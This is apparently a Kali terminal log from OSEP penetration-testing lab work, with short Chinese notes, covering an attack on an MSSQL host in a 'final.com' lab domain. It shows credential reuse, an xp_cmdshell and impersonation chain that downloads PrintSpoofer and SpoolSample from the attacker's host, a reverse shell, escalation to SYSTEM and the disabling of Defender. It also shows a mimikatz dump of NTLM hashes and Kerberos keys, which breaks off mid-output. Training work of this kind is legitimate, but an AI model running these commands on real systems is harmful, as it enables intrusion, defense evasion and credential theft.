proxychains4 impacket-mssqlclient <tommy:[email protected]> -port 1433 -windows-auth
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 impacket-mssqlclient <tommy:[email protected]> -port 1433 -windows-auth
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL03\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL03\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> **enable_xp_cmdshell**
**[-] ERROR(SQL03\\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(SQL03\\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(SQL03\\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(SQL03\\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.**
proxychains4 crackmapexec smb 172.16.243.187 -u tommy -p '89dsfsji43A’
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 crackmapexec smb 172.16.243.187 -u tommy -p '89dsfsji43A'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:135 <--socket error or timeout!
**SMB 172.16.243.187 445 SQL03 [*] Windows 10.0 Build 17763 (name:SQL03) (domain:final.com) (signing:False) (SMBv1:False)**
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.187:445 ... OK
SMB 172.16.243.187 445 SQL03 [+] final.com\\tommy:89dsfsji43A
从172.16.243.194的MSSQL反弹回来shell
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80 130 ⨯
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 62068
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
C:\\Windows\\system32>hostname
hostname
sql03
C:\\Windows\\system32>whoami
whoami
final\\sqlsvc03
C:\\Windows\\system32>cd c:\\Users\\sqlsvc03\\Desktop
cd c:\\Users\\sqlsvc03\\Desktop
c:\\Users\\sqlsvc03\\Desktop>more local.txt
more local.txt
299ca8cec8c772177e8103aa21363b63
c:\\Users\\sqlsvc03\\Desktop>
c:\\Users\\sqlsvc03\\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
**SeImpersonatePrivilege Impersonate a client after authentication Enabled**
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
直接下载文件无法完成下载:
c:\\Users\\sqlsvc03\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
Access is denied.
c:\\Users\\sqlsvc03\\Desktop>cd c:\\windows\\tasks
cd c:\\windows\\tasks
c:\\Windows\\Tasks>certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
Access is denied.
还是用MSSQL下载:
EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri [<http://192.168.49.243/PrintSpoofer.exe>](<http://192.168.49.243/PrintSpoofer.exe>) -o c:\\windows\\tasks\\PrintSpoofer.exe'';') AT SQL03
EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri [<http://192.168.49.243/SpoolSample_x64.exe>](<http://192.168.49.243/SpoolSample_x64.exe>) -o c:\\windows\\tasks\\SpoolSample_x64.exe'';') AT SQL03
c:\\Windows\\Tasks>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1A6E-76A0
Directory of c:\\Windows\\Tasks
08/04/2022 01:43 AM <DIR> .
08/04/2022 01:43 AM <DIR> ..
08/04/2022 01:42 AM 7,680 PrintSpoofer.exe
08/04/2022 01:19 AM 5,632 revshell.exe
08/04/2022 01:43 AM 151,040 SpoolSample_x64.exe
3 File(s) 164,352 bytes
2 Dir(s) 6,136,041,472 bytes free
提权:
c:\\Windows\\Tasks>**PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe**
PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe
Waiting for client to connect to named pipe...
c:\\Windows\\Tasks>hostname
hostname
sql03
c:\\Windows\\Tasks>**SpoolSample_x64.exe sql03 sql03/pipe/test**
SpoolSample_x64.exe sql03 sql03/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
c:\\Windows\\Tasks>PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe
PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe
Waiting for client to connect to named pipe...
Impersonated user is: NT AUTHORITY\\SYSTEM.
Executed 'c:\\Windows\\Tasks\\revshell.exe' with impersonated token!
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 62129
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
nt authority\\system
C:\\Windows\\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
C:\\Windows\\system32>cd c:\\Users\\Administrator\\Desktop
cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop>more proof.txt
more proof.txt
ec8dce67fea16d638ade1419bfe3526e
c:\\Users\\Administrator\\Desktop>powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
c:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop>mimikatz.exe "sekurlsa::logonPasswords" "exit"
mimikatz.exe "sekurlsa::logonPasswords" "exit"mimikatz.exe "sekurlsa::logonPasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 1505670 (00000000:0016f986)
Session : Service from 0
User Name : sqlsvc03
Domain : FINAL
Logon Server : DC01
Logon Time : 8/3/2022 11:59:38 PM
SID : S-1-5-21-1725955968-4040474791-670206374-1113
msv :
[00000003] Primary
* Username : sqlsvc03
* Domain : FINAL
* NTLM : 77f944ff6e0c0ed0c83dcef57bdf9298
* SHA1 : 747df671015d1ec1c50ffc38f4ecc97b7ead8c32
* DPAPI : 17aa3dc68e3e67783ace602437ee352c
tspkg :
wdigest :
* Username : sqlsvc03
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sqlsvc03
* Domain : FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 655864 (00000000:000a01f8)
Session : Interactive from 0
User Name : setup
Domain : SQL03
Logon Server : SQL03
Logon Time : 8/3/2022 11:58:37 PM
SID : S-1-5-21-4076639736-4188291740-2971731876-1001
msv :
[00000003] Primary
* Username : setup
* Domain : SQL03
* NTLM : 1fd7eecf8c3c358597ffe32797ed01e9
* SHA1 : d39aa8a081c1c3c8c36167274a4c9f55e3bf3163
tspkg :
wdigest :
* Username : setup
* Domain : SQL03
* Password : (null)
kerberos :
* Username : setup
* Domain : SQL03
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 542074 (00000000:0008457a)
Session : Interactive from 0
User Name : setup
Domain : SQL03
Logon Server : SQL03
Logon Time : 12/29/2021 11:30:25 PM
SID : S-1-5-21-4076639736-4188291740-2971731876-1001
msv :
[00000003] Primary
* Username : setup
* Domain : SQL03
* NTLM : 1fd7eecf8c3c358597ffe32797ed01e9
* SHA1 : d39aa8a081c1c3c8c36167274a4c9f55e3bf3163
tspkg :
wdigest :
* Username : setup
* Domain : SQL03
* Password : (null)
kerberos :
* Username : setup
* Domain : SQL03
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 107096 (00000000:0001a258)
Session : Service from 0
User Name : SQLTELEMETRY$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 12/29/2021 11:21:23 PM
SID : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SQL03$
Domain : FINAL
Logon Server : (null)
Logon Time : 12/29/2021 11:21:20 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sql03$
* Domain : FINAL.COM
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 35035 (00000000:000088db)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 34991 (00000000:000088af)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 33774 (00000000:000083ee)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID :
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/29/2021 11:21:21 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 53784 (00000000:0000d218)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/29/2021 11:21:20 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SQL03$
Domain : FINAL
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sql03$
* Domain : FINAL.COM
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
mimikatz.exe "sekurlsa::logonPasswords" "exit"mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 1505670 (00000000:0016f986)
Session : Service from 0
User Name : sqlsvc03
Domain : FINAL
Logon Server : DC01
Logon Time : 8/3/2022 11:59:38 PM
SID : S-1-5-21-1725955968-4040474791-670206374-1113
msv :
[00000003] Primary
* Username : sqlsvc03
* Domain : FINAL
* NTLM : 77f944ff6e0c0ed0c83dcef57bdf9298
* SHA1 : 747df671015d1ec1c50ffc38f4ecc97b7ead8c32
* DPAPI : 17aa3dc68e3e67783ace602437ee352c
tspkg :
wdigest :
* Username : sqlsvc03
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sqlsvc03
* Domain : FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 655864 (00000000:000a01f8)
Session : Interactive from 0
User Name : setup
Domain : SQL03
Logon Server : SQL03
Logon Time : 8/3/2022 11:58:37 PM
SID : S-1-5-21-4076639736-4188291740-2971731876-1001
msv :
[00000003] Primary
* Username : setup
* Domain : SQL03
* NTLM : 1fd7eecf8c3c358597ffe32797ed01e9
* SHA1 : d39aa8a081c1c3c8c36167274a4c9f55e3bf3163
tspkg :
wdigest :
* Username : setup
* Domain : SQL03
* Password : (null)
kerberos :
* Username : setup
* Domain : SQL03
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 542074 (00000000:0008457a)
Session : Interactive from 0
User Name : setup
Domain : SQL03
Logon Server : SQL03
Logon Time : 12/29/2021 11:30:25 PM
SID : S-1-5-21-4076639736-4188291740-2971731876-1001
msv :
[00000003] Primary
* Username : setup
* Domain : SQL03
* NTLM : 1fd7eecf8c3c358597ffe32797ed01e9
* SHA1 : d39aa8a081c1c3c8c36167274a4c9f55e3bf3163
tspkg :
wdigest :
* Username : setup
* Domain : SQL03
* Password : (null)
kerberos :
* Username : setup
* Domain : SQL03
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 107096 (00000000:0001a258)
Session : Service from 0
User Name : SQLTELEMETRY$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 12/29/2021 11:21:23 PM
SID : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SQL03$
Domain : FINAL
Logon Server : (null)
Logon Time : 12/29/2021 11:21:20 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sql03$
* Domain : FINAL.COM
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 35035 (00000000:000088db)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
